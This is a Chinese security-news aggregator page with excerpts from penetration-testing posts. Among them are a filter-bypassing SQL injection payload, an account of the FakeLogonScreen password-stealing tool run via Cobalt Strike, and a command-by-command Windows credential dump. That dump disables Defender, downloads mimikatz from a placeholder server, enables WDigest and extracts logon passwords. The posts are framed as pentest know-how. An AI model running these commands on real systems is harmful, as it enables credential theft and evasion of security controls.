CTFHub-Web技能树 - Vicen
SQL注入 绕过select 1';Set @xx=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;Prepare abc from @xx;execute abc;#(select * from `1919810
Aggregator
伪造windows登录屏幕窃取密码之FakeLogonScreen
5 years 2 months ago
在windows环境中,获取系统密码,提升系统权限。在渗透测试是经常遇到的。今天这里介绍一款伪造windows登录屏幕以达到窃取密码或题全的软件——FakeLogonScreen。
简介FakeLogonScreen这个程序是用于伪造windows登录凭证以获取系统登录密码。它会获取当前系统配置的背景图片,这样显得更加真实,成功率也会更高。
另外,该程序会对输入的密码进行Active Directory或本地计算机的认证,以确保窃取密码的准确性。它可以显示在控制台,也可以保存早文件远程系统的硬盘上。
这个软件的好处就是可以与其它工具配合使用,可以直接通过内存执行(无文件)。比如可以配合Cobalt Strike的execute-assembly来执行。
运行环境由于使用c#编写,需要系统中有.net framework框架。这里测试windows10和windows7,系统均为64位。在其release的版本中,作者给出来.net framework3.5和4.5的可执行程序。适用于windows7 和windows10等情况。实际中可根据实际情况进行选择。
利用可以配合Cobalt Strike,系统上线后,进入到beacon中,然后直接执行execute-assembly /root/Desktop/FakeLogonScreen.exe 。(后面为控制机上的文件路径,非被控机的路径)。接下来就是等待对方输入密码,即可在进入的beacon中显示输入的密码了。效果图如下:
Is Your Organization Ready for COVID-19?
5 years 2 months ago
Expect COVID-19 (Coronavirus) to touch your organization soon, if it hasn’t already. You need to be ready for shortages, slowdowns, absent personnel, and a high percentage of concurrent remote access workers.
HashCat:如何利用HashCat破解NTLMv2 hash?
5 years 2 months ago
TonghuaRoot
GCSB’s role in supporting national security decision making
5 years 2 months ago
Presentation by GCSB Director General Andrew Hampton to Otago University Pols213, 3 March 2020
Growing, Exploring and My First Conference
5 years 2 months ago
By now, we are all subject in one way or another to the far-reaching impact of COVID-19. As we see on the news each day, the numbers of those infected by this deadly coronavirus continue to grow in terrifying increments. And even for those of us without family members or friends directly impacted by the virus, life has profoundly changed.
Bridget Meuse
Windows Server 2016抓取明文密码
5 years 2 months ago
临时禁止Windows Defender
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f gpupdate /force下载mimikatz后解压缩。
powershell.exe -NoP -NonI -Exec Bypass -Command "& {Import-Module BitsTransfer; Start-BitsTransfer 'http://你的服务器/mimikatz_trunk.zip' "%APPDATA%\mimikatz_trunk.zip"}"修改注册表开启UseLogonCredential
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f等用户下次再登录的时候,可抓到明文密码
mimikatz.exe privilege::debug sekurlsa::logonpasswords exit完成一次渗透测试项目
5 years 2 months ago
小B接到一个渗透测试任务,由于很久没有从乙方视⻆执行渗透测试的他决定先梳理一下自己的思路。
完成一次渗透测试项目
5 years 2 months ago
小B接到一个渗透测试任务,由于很久没有从乙方视⻆执行渗透测试的他决定先梳理一下自己的思路。
完成一次渗透测试项目
5 years 2 months ago
小B接到一个渗透测试任务,由于很久没有从乙方视⻆执行渗透测试的他决定先梳理一下自己的思路。
我也来喷一喷零信任
5 years 2 months ago
- 2019年12月26日 11:29
零信任安全架构的核心就是 Never Trust, Always Verify。
说白了就是针对身份实体的请求上下文做一个综合判断,最后给出allow或者deny的结论,可玩的点还是在
TonghuaRoot
Guardicore at RSA: AI-Powered Segmentation, Cloud Native Security
5 years 2 months ago
This week we?re announcing two new capabilities in our Centra Security Platform that further deliver on that mission: Support for cloud-native resources and AI-powered segmentation.
Guardicore Labs Team
2019 TLS Telemetry Report Summary
5 years 2 months ago
The Summary of the 2019 F5 Labs TLS Telemetry Report expands the scope of our research to bring deeper insights into encryption on the web, including ciphers, SSL/TLS versions, and digital certificates.
关于我
5 years 2 months ago
庚子之年,回首过去入安全这行已16年,从小兵到负责集团安全,还记得第一次面试时的忐忑,担心经验不够,无法证明
关于我
5 years 2 months ago
庚子之年,回首过去入安全这行已16年,从小兵到负责集团安全,还记得第一次面试时的忐忑,担心经验不够,无法证明
关于我
5 years 2 months ago
庚子之年,回首过去入安全这行已16年,从小兵到负责集团安全,还记得第一次面试时的忐忑,担心经验不够,无法证明
企业安全建设的体系思考与落地实践(二)
5 years 2 months ago
今天这篇文章没有太多的技术细节,也可能会让你觉得很枯燥,甚至连文章的标题我都懒得起,但是我觉得如果你实在无聊也可以读一读,或许给你些许启发。
RSAC 2020 以色列国家展台的16个标签
5 years 2 months ago
以色列,不到900万的人口,却拥有着近500家的网络安全公司,每年网络安全产业的融资规模仅次于美国,它所孕育
RSAC 2020 以色列国家展台的16个标签
5 years 2 months ago
以色列,不到900万的人口,却拥有着近500家的网络安全公司,每年网络安全产业的融资规模仅次于美国,它所孕育
RSAC 2020 以色列国家展台的16个标签
5 years 2 months ago
以色列,不到900万的人口,却拥有着近500家的网络安全公司,每年网络安全产业的融资规模仅次于美国,它所孕育